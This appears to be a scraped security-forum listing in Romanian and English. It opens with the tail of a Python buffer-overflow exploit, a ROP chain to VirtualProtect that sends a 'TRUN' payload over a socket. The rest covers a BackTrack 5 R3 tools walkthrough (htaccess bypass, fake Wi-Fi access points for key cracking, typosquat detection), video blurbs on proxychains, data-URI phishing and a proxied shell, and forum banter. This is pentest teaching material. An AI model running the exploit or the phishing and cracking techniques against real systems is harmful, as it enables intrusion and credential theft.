pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, nprotect_loc) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77C14001) # xchg eax, ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, nprotect) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C951376) # MOV DWORD PTR DS:[EAX],ECX [/FONT] [FONT=Courier New]# fourth param [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, oldprotect_loc) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x77C14001) # xchg eax, ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C9029AC) # pop edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xffffffff) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C971980) #pop ecx [/FONT] [FONT=Courier New]eip += pack(‘<L’, oldprotect) [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x71AB100C) #xor ecx, edi [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C951376) # MOV DWORD PTR DS:[EAX],ECX [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C801AD0 ) # VirtualProtect [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0x7C941EED) # JMP ESP [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xdeadbeef) #1 [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xdeadbeef) #2 [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xdeadbeef) #3 [/FONT] [FONT=Courier New]eip += pack(‘<L’, 0xdeadbeef) #4 [/FONT] [FONT=Courier New]s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) [/FONT] [FONT=Courier New]s.connect((target,port)) [/FONT] [FONT=Courier New]s.send(“TRUN .” + “a” * 2006 + eip + buf) [/FONT] [FONT=Courier New]s.recv(1000) [/FONT] [FONT=Courier New]s.close() [/FONT] Sursa InfoSec Institute Resources
-
- 1
-
Atunci daca erai baiat destept, "intelept", faceai un poll, in stilul unui sondaj in care adresai aceasta intrebare fara caracter personal, si faceai asa cum spui ca ti`ai propus un asa-numit sondaj asupra gandirii noastre.
-
Uite unde se ascundeau etica, moralitatea, Fuego, mila, etc. ale romanilor. Scuze de, ce`o vrea sa insemne postul meu, dar in opinia mea, esti doar frustrat pentru ca un smecheras te`a palmuit cu palosul realitatii, iar cu ochii`n lacrimi de frustrare si furie ai venit aici sa pari un erou al neamului. Subiect demn de TPU. Rusine!
-
This article is in continuation to part 1 of the Backtrack Walkthrough Series. In the previous articles we discussed some of the most important new tools that were added in the most recent revision of Backtrack 5 like Dnmap, Fern-Wifi-Cracker etc. In this article we will look at some of the other main tools added in Backtrack 5 R3. HTExploit HTExploit was released at Blackhat 2012 by Matias KATZ and Maximiliano SOLER. HTExploit (HiperText access Exploit) is a tool that is used to bypass authentication mechanisms which is deployed on websites using .htaccess files. The tool is written in Python. Once the restriction is bypassed, it will be possible to figure out the contents of a directory and even download those files. The tool works in a recursive manner,i.e once it downloads the first chunk of files, it looks for links inside those files and downloads those files as well. This process keeps on going until it has downloaded the entire content of the directory. It then generates an html report informing us about all the files that it has downloaded. The tool has 2 modules that can be executed. Detect- This module only informs the user if the target is vulnerable to the exploit or not. Full – This module runs the attack on the directory using a dictionary that contains a list of the common file names. If those file names are found and if the directory is vulnerable, it is possible to download that file from the server. In a recent chat session with Maximiliano Soler, one of the 2 people behind this tool, he informed us about how the actual vulnerability is exploited. Maximilano Soler:The main problem is that sometimes the restrictions are based in the directive by using “Limit GET POST”.So the problem is that they only put these well known methods for authentication checking. But what happens when we create a different method? for eg. “POTATO”.Apache will proceed with the request and pass this “unknown” method to PHP. PHP says…ok, I will use this method like “GET”. Voila! If you have the exact name of the file, you will be able to download it. This is not a bruteforce attack as we are able to figure out the contents of your directory without knowing your password. There are some ways in which you can protect yourself. Remove the methods from “Limit”. Use Limit with GET and POST, but also with LimitExcept. Alternatively, you can use a module from Apache Mod_AllowMethods. If you are a developer you could also validate the typical variables: $PHP_AUTH_USER, $_SERVER["REQUEST_METHOD"]. If something else is found that GET or POST, then disallow it. Here is some sample code used in htaccess files that puts limitations for only GET and POST methods. HTExploit can be found under the directory /pentest/web/htexploit. And now for a demo of HTExploit, i modified the htaccess settings in one of my websites and was able to successfully run the tool against it. Type the command as shown in the image below to run HTExploit against a targeted website.Once it detect that the target is vulnerable, it will ask you if you want to run a full scan on it. After this, wait for the scan to complete. Once the scan is run, it will generate a HTML report reporting the files that it was able to download locally. Here is what a sample report looks like. Wifi Honey Wifi Honey is another great tool that was introduced with Bactrack 5 R3. Basically, in most of the cases it is possible to crack the WEP or WPA encryption key of a network with just a client which is probing for that network. In case of WEP, it is possible by Caffe Latte attack whereas in WPA, it is possible to capture the first 2 packets of the WPA handshake by using just the probing client and that gives us sufficient information in order to crack the WPA key for that network. Using airodump-ng, it is very easy to figure out which network (ESSID) the client is probing for. However, what is not clear by figuring out the ESSID of the probed network is the encryption that network is using. Only by knowing the kind of encryption will we be able to figure out how to crack the encryption. A general technique used to figure this out is by creating four different access points with encryption such as None, WEP, WPA, and WPA 2 using airbase-ng. The probing client will then connect to one of these networks and hence the kind of encryption being used is figured out. At the same time, airodump-ng could also be used to capture the traffic and hence later used to crack WPA. What Wifi Honey does is automate this whole process of creating fake Access points. It create 5 virtual interfaces, 4 of them for creating 4 AP’s with same ESSID but different encryption and another 5th interface for airodump-ng to monitor the traffic on. Hence, at the time the probing client connects to our fake Access point, airodump-ng is being used to capture the traffic. Wifi Honey takes 3 parameters, the ESSID of the network that is being probed, the channel no on which you want the AP to listen, and the interface on which you want to create it. Once we enter this, we will see that it creates 4 networks of the same name with different encryption and also starts airodump-ng at the same time to capture the traffic. Now the probing client will connect to this network and the captured traffic by airodump-ng could be used to crack the encryption key. UrlCrazy URLCrazy is a tool to determine if a domain name is being abused or not by looking at different examples of domain names caused by typos in the original domain name. For e.g a phishing attack can be carried out very easily by changing just one character in a domain name and then redirecting the user to that domain name, mainly because the user will not be able to recognize the change. What Urlcrazy does is use typos in your domain names to generate new domain names and figure out if those domain names exist or not. If they exist, it fetches out info like A and MX records for that particular domain name. Here are the different options available in urlcrazy. Let’s run a urlcrazy query against google.com. As you can see, it found a number of domain names similar to Google. In some cases, the url found may not be used for malicious purposes. For e.g google.fr is just the French version of Google and so on. However, some other search results look like they were bought mainly to be used in case someone typed that domain name instead of Google by mistake. Overall, this tool could be highly beneficial to large corporations who are looking to protect themselves from phishing attacks and any other form of corporate espionage. References: HTExploit HTExploit - Bypassing htaccess Restrictions Wifi Honey – DigiNinja Wifi Honey - DigiNinja URLCrazy URLCrazy Sursa InfoSec Institute Resources
-
https://www.youtube.com/watch?v=xVDPgqb3AHo&feature=g-u-u [TABLE=class: grid, width: 642] [TR] [TD]Published on Oct 6, 2012 by theatregelap[/TD] [/TR] [TR] [TD] Perkongsian Ilmu Komputer | computer knowledge sharing: antiRAT Malware program / file was easy analyze by using this tool.After analyze its give the complete report ( API , Registry , File drop , Network analysis ) For detailed information.. go to Perkongsian Ilmu Komputer | computer knowledge sharing: Detect Program contain Backdoored ( RAT / DDOS / BOT / Keylooger / stealer) with Buster Sandbox Analyzer [/TD] [/TR] [/TABLE] Sursa YouTube
-
[TABLE=class: grid, width: 642] [TR] [TD]Published on Oct 8, 2012 by TekDefense[/TD] [/TR] [TR] [TD]ProxyChains-3.1 (ProxyChains - TCP and DNS through proxy server. HTTP and SOCKS) Proxychains is a tool to force connections through multiple proxies. What makes this tool special is putting applications without native proxy capabilities through a proxy. Config: /etc/proxychains.conf Three main modes 1. Dynamic - All proxies chained in order listed. Dead proxies are skipped. 2. Strict - All proxies chained in order listed. If a proxy is dead, the chain is dropped. 3. Random - Randomly chains proxies within the list. -If using Random, give a chain length to specify how many proxies are used. Other Important config options: proxy_dns: ensure this is uncommented if you want to proxy dns requests. If you don't DNS requests will be handled in the standard manner, unproxied. List the proxies use the format of: "Type address port" Socks4 127.0.0.1 8888 Usage: proxychains "application" proxyxhains curl ifconfig.me proxychains firefox proxychains ssh root@8.8.8.8' proxychains xhydra 1aN0rmus@Tekdefense.com, securitytube.net/user/1aN0rmus youtube.com/user/TekDefense[/TD] [/TR] [/TABLE] Sursa YouTube
-
Sintaxe postate, challenge closed.
-
Scuze, nu citisem cerintele,
-
Cine-i Guess Who?
-
dafuq? /* "forum hack" e doua cuvinte. */
-
[TABLE=class: grid, width: 642] [TR] [TD]Published on Oct 7, 2012 by Ajin Abraham[/TD] [/TR] [TR] [TD]"The data URI scheme is a URI scheme (Uniform Resource Identifier scheme) that provides a way to include data in-line in web pages as if they were external resources. This technique allows normally separate elements such as images and style sheets to be fetched in a single HTTP request rather than multiple HTTP requests, which can be more efficient." -- Wikipedia Data URI is having a specific format. We exploit a particular format of data URI for implementing phishing. Watch the video for detailed explanation and Demonstration of Data URI Phishing on facebook.[/TD] [/TR] [/TABLE] Sursa YouTube
-
GNU Debugger Expert: Part 11: Setting up Debian ARMEL in QEMU
Wubi posted a topic in Tutoriale video
[TABLE=class: grid, width: 642] [TR] [TD]Published on Oct 5, 2012 by TheSecurityTube[/TD] [/TR] [TR] [TD]PDF Slides and Code Download: Securitytube Gnu Debugger Expert: Part 11: Setting Up Debian Armel In Qemu[/TD] [/TR] [/TABLE] Sursa YouTube -
[TABLE=class: grid, width: 642] [TR] [TD]Published on Oct 6, 2012 by Technic Dynamic[/TD] [/TR] [TR] [TD]This time we will be adding an extra dose of anonymity and privacy to our Python shell, by providing support for proxies. Socks4, Socks5 or HTTP; it's your choice -- got 'em all. The AES encryption is undoubtedly the strongest factor in this equation, because without it, the proxy server -- or anyone in between really -- would be able to see all the traffic from point A to point B. The encryption however, shields us from pesky intruders and allows our connection to stay smooth and unblocked by ISP's along the way. Read full article: http://technicdynamic.com/2012/10/python-socket-thru-proxy-using-socksipy/ SocksiPy: SocksiPy - A Python SOCKS module | Free software downloads at SourceForge.net[/TD] [/TR] [/TABLE] Sursa YouTube